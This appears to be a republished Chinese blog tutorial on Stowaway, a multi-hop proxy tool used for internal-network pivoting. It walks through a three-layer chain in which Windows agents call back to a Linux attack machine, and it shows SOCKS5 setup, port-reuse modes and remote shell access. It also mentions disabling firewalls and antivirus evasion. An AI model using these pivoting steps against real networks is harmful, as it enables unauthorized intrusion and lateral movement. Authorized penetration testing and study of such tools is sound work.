文章总结： 本文介绍了基于Go语言的多级代理工具Stowaway，支持跨平台与多架构，适用于内网穿透。文章详解了其命令用法及三层代理搭建演示，涵盖节点连接、SOCKS5代理设置及端口复用功能。该工具能突破内网限制实现流量转发，但缺乏可视化拓扑图，适合红队行动中使用。 综合评分： 85 文章分类： 渗透测试,内网渗透,安全工具,红队

Stowaway多级代理工具

原创

白小客 白小客

白小客

2026年1月17日 21:27 广东

Stowaway多级代理工具

分享一款好用的多级代理工具，不需要修改配置文件，命令也十分简单，代理支持win、linux和mac，各种架构也适配，代理管理十分简单。

1

简介

2

部分命令解释

3

演示环节

1 简介

GitHub地址

https://github.com/ph4ntonn/Stowaway/

Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具。

用户可使用此程序将外部流量通过多个节点代理至内网，突破内网访问限制，构造树状节点网络，并轻松实现管理功能。

（缺点：下面node的里面数字只是一个标记，没有代理层级的意思，所以这个代理有一个缺点就是没有拓扑图显示，需要自行记录拓扑。）

2 部分命令解释

help 可以查看当前窗口下的命令提示back 回退窗口，用于从节点操作（node）回退到代理服务端（admin）。-l 被动模式下的监听地址，指定监听ip和端口，不指定ip默认0.0.0.0。-s 指定通信加密密钥（AES-256-GCM加密），若为空，则代表通信不被加密。-c 主动模式下的目标节点地址，指定连接的节点ip和端口，不指定ip默认0.0.0.0。
# 进入节点后的命令use id 可以对节点进行操作。socks 8888 user pass 设置socks5代理，可加账号密码认证。listen 开启节点监听，用于接收二级代理回连。--reconnect 10 重连时间间隔，此参数仅用在agent，且仅用在主动模式下。

3 演示环节

基于三个Windows主机进行演示，服务端为Linux系统。对于不同系统，命令都是一样，只是执行的程序不一样。

下面是拓扑图。

注意，监听端口不能被防火墙拦截，所以实际攻防中，肯定要给防火墙加端口放行规则或直接关闭防火墙演示的是被动模式，也可以用主动模式，替换l为c，c换l。
Linux攻击机（监听9999端口，开启AES加密）    🡑（NAT：192.168.1.22）    |    |    |（NAT：192.168.1.26）（主动回连Linux攻击机11111端口，同样开启AES加密）一层代理主机win1    🡑（VMnet11：10.0.1.136）（node1节点开启监听端口11111，也就是win1监听11111端口）    |    |    |（VMnet11：10.0.1.135）（主动回win1的11111端口，同样开启AES加密）二层代理主机win2    🡑（VMnet12：10.0.10.100）（node2节点开启监听端口11111，也就是win2监听11111端口）    |    |    | （VMnet12：10.0.10.102）（主动回win2的11111端口，同样开启AES加密）三层代理主机win3

1.先开启服务端。

./linux_x64_admin -l 192.168.1.22:9999 -s 666

2.一层代理（win1回连Linux攻击机）

.\windows_x64_agent.exe -c 192.168.1.22:9999 -s 666

可以使用detail命令查看代理节点情况。

至于socks5代理搭建，十分简单

# 进入节点use 0# socks5设置（注意：这个端口指的是vps的端口）socks 1111（注意记录这个socks5设置情况，程序没有显示的地方，所以这也是一个缺点，不过有一个记录信息功能，我觉得一般）

3.二层代理（win2回连win1）

先在win1上开启监听11111

# 进入节点use 0# 监听设置listen选择1 Normal passive设置监听ip和端口10.0.1.136:11111

[*] 请注意！如果您选择 IPTables 复用或 SO 复用，**必须确认您要控制的节点是通过对应方式启动的！**

[*] 当您选择 IPTables 复用或 SO 复用时，节点将使用「启动时的初始配置」来实现端口复用！

[*] 请选择模式（1.普通被动模式 / 2.IPTables 复用模式 / 3.SO 复用模式）：

1: Normal passive：普通被动模式，使用独立的自定义端口通信，无复用需求。

2: IPTables Reuse：基于 Linux 系统 IPTables 防火墙规则的端口复用技术，仅适用于 Linux。

3: SOReuse：基于TCP/IP套接字选项（SO_REUSEADDR/SO_REUSEPORT）的跨平台端口复用技术，支持 Windows/Linux。

win2回连win1

.\windows_x64_agent.exe -c 10.0.1.136:11111 -s 666

回车即可，这样二层代理就搭建好了

4.三层代理（win3回连win2）

先在win2上开启监听11111

# 进入节点use 1# 监听设置listen选择1 Normal passive设置监听ip和端口10.0.10.100:11111

win3回连win2

.\windows_x64_agent.exe -c 10.0.10.100:11111 -s 666

回车即可，这样三层代理就搭建好了

还可以通过shell命令获取终端，不过觉得没什么用，实际攻防也不大用的到。

如果遇到乱码，shell后执行chcp 65001，将当前终端的字符编码页切换为UTF-8编码，Windows系统是GBK编码。

当然了，这只是展示了三层win主机代理搭建，实际攻防肯定有Linux，不过命令都一样，换个程序罢了。

再附上一张图，盖程序不会报毒。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：白小客 白小客 白小客《Stowaway多级代理工具》